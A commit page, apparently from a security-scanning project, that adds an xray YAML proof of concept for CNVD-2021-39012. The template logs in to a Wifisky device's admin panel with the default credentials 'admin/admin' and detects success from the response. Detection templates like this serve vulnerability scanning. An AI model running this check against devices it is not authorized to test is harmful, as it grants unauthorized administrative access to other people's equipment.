优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
@@ -0,0 +1,13 @@
name: poc-yaml-wifisky-default-password-cnvd-2021-39012
rules:
- method: POST
path: /login.php?action=login&type=admin
follow_redirects: false
body: >-
username=admin&password=admin
expression: |
response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}")
detail:
author: Print1n(http://print1n.top)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012